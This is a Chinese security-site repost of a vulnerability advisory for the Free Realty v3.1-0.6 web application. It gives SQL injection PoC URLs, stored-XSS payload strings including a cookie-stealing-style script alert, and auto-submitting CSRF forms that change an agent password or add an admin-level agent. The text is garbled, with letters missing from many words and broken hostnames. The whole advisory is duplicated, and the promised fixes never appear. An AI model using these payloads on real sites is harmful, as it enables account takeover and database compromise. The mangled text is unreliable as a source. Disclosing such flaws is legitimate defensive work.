Free Realty v3.1-0.6的缺陷介绍及其修复方法
网络安全 2021-07-03 09:19www.168986.cn网络安全知识
标题Free Reality v3.1-0.6 - Multiple Web Vulnerabilities
介绍:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the inter. With Free Realty the end
user does not need to be fluent in web page design. Read more in the demo site
This is a fork of
software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
continued development on the 2.x series. Other sites of note regarding 2.x development
.1axn./gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own.
影响版本:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Reality v3.1-0.6 web application.
问题类型:Remote
技术分析:
========
1.1
A remote SQL Injection vulnerability is detected in the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user aount to inject/execute own sql mands on
the affected application dbms. Suessful exploitation of the vulnerability results in dbms & application promise.
Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /admin/admin.php?edit=
1.2
Multiple persistent input validation vulnerabilities are detected in the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Suessful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action.
Vulnerable Module(s):
[+] admin/agenteditor.php - inject notes about the Agent
[+] agentadmin.php?edit=2 - inject title / preview description: / Long description: / notes
[+] agentadmin.php?action=addlisting inject title / preview description: / Long description: / notes
[+] admin/adminfeatures.php - Add new feature
1.3
A cross site request fery vulnerability is detected in in the Free Reality v3.1-0.6 web application. The bugs allow remote
attackers with high required user inter action to edit user aounts. Suessful exploitation can lead to aount aess.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the
remote can implement his own values for the update because of no form or token protection. When admin get now forced to
execute the script via link he is executing the new value on the update of the application if his session is not expired.
Vulnerable Module(s):
[+] admin/agenteditor.php?action=addagent - Add agent
[+] admin/agenteditor.php?adminmodify=2 - Modify Agent
测试证明:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
PoC:
https://.jb51. /FR/agentdisplay.php?view=1[SQL-INJECTION!]
http://127.0.0.1/FR/admin/admin.php?edit=2[SQL-INJECTION!]
1.2
The persistent input validation vulnerability can be exploited by remote attackers with medium till low required user inter action.
For demonstration or reproduce ...
Note:
The issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings:
>"<<iframe src=http:// .jb51. />37</iframe> ... or
>"<script>alert(document.cookie)</script><div style="1
1.3
The csrf vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ...
<html>
<form name="test" action="http://127.0.0.1/FR/admin/agenteditor.php?adminmodify=2" method="post">
<input type="hidden" name="agent" value="test2"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>
<html>
<form name="addagent" action="http://127.0.1.1/FR/admin/agenteditor.php?action=addagent" method="post">
<input type="hidden" name="agent" value="test3"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="test3"><br/>
<input type="hidden" name="agentfax" value="test3"><br/>
<input type="hidden" name="agentcell" value="test3"><br/>
<input type="hidden" name="agentphone" value="test3"><br/>
<input type="hidden" name="agenturl" value="test3"><br/>
<input type="hidden" name="agentemail=" value="test3@hotmail."><br/>
<input type="hidden" name="user_level" value="admin"><br/>
<input type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>
Risk:
=====
1.1
The security risk of the remote SQL injection vulnerability is estimated as critical.
1.2
The security risk of the persistent input validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request fery vulnerability is estimated as low(+).
介绍:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the inter. With Free Realty the end
user does not need to be fluent in web page design. Read more in the demo site
This is a fork of
software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
continued development on the 2.x series. Other sites of note regarding 2.x development
.1axn./gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own.
影响版本:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Reality v3.1-0.6 web application.
问题类型:Remote
技术分析:
========
1.1
A remote SQL Injection vulnerability is detected in the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user aount to inject/execute own sql mands on
the affected application dbms. Suessful exploitation of the vulnerability results in dbms & application promise.
Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /admin/admin.php?edit=
1.2
Multiple persistent input validation vulnerabilities are detected in the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Suessful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action.
Vulnerable Module(s):
[+] admin/agenteditor.php - inject notes about the Agent
[+] agentadmin.php?edit=2 - inject title / preview description: / Long description: / notes
[+] agentadmin.php?action=addlisting inject title / preview description: / Long description: / notes
[+] admin/adminfeatures.php - Add new feature
1.3
A cross site request fery vulnerability is detected in in the Free Reality v3.1-0.6 web application. The bugs allow remote
attackers with high required user inter action to edit user aounts. Suessful exploitation can lead to aount aess.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the
remote can implement his own values for the update because of no form or token protection. When admin get now forced to
execute the script via link he is executing the new value on the update of the application if his session is not expired.
Vulnerable Module(s):
[+] admin/agenteditor.php?action=addagent - Add agent
[+] admin/agenteditor.php?adminmodify=2 - Modify Agent
测试证明:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
PoC:
https://.jb51. /FR/agentdisplay.php?view=1[SQL-INJECTION!]
http://127.0.0.1/FR/admin/admin.php?edit=2[SQL-INJECTION!]
1.2
The persistent input validation vulnerability can be exploited by remote attackers with medium till low required user inter action.
For demonstration or reproduce ...
Note:
The issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings:
>"<<iframe src=http:// .jb51. />37</iframe> ... or
>"<script>alert(document.cookie)</script><div style="1
1.3
The csrf vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ...
<html>
<form name="test" action="http://127.0.0.1/FR/admin/agenteditor.php?adminmodify=2" method="post">
<input type="hidden" name="agent" value="test2"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>
<html>
<form name="addagent" action="http://127.0.1.1/FR/admin/agenteditor.php?action=addagent" method="post">
<input type="hidden" name="agent" value="test3"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="test3"><br/>
<input type="hidden" name="agentfax" value="test3"><br/>
<input type="hidden" name="agentcell" value="test3"><br/>
<input type="hidden" name="agentphone" value="test3"><br/>
<input type="hidden" name="agenturl" value="test3"><br/>
<input type="hidden" name="agentemail=" value="test3@hotmail."><br/>
<input type="hidden" name="user_level" value="admin"><br/>
<input type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>
Risk:
=====
1.1
The security risk of the remote SQL injection vulnerability is estimated as critical.
1.2
The security risk of the persistent input validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request fery vulnerability is estimated as low(+).
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想